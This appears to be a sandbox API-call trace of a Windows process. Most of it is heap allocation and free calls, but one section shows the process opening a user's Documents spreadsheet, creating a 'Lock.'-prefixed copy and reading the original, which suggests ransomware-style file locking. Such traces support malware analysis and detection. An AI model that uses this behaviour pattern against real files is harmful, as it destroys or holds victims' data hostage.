[0263.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0263.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0263.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0263.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0263.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0263.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0263.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0263.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0263.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0263.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0263.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0263.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0263.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0263.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0263.266] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0263.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0263.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0263.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0263.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0263.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0263.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0263.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0263.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0263.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0263.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0263.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.269] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0263.269] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0263.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.269] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0263.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0263.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0263.270] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0263.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0263.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0263.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.270] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0263.270] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Fuv1mdjpidzq-6YHGh.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\fuv1mdjpidzq-6yhgh.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0263.271] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0263.271] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0263.271] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0263.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.271] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0263.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0263.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.272] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0263.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0263.272] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.272] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0263.272] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0263.272] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0263.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0263.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0263.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0263.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0263.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0263.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0263.273] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0263.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0263.273] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0263.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0263.273] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0263.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0263.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0263.275] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.Fuv1mdjpidzq-6YHGh.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.fuv1mdjpidzq-6yhgh.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0263.275] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0263.275] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0263.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0263.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0263.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0263.276] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0263.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0263.276] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.276] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0263.276] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0263.276] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0263.276] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0263.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0263.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0263.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0263.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0263.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0263.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0263.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0263.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0263.277] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0263.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0263.277] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125f020 [0263.281] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0263.281] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0263.286] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x324e, lpOverlapped=0x0) returned 1 [0263.286] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0263.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0263.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0263.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1324e) returned 0x2f14010 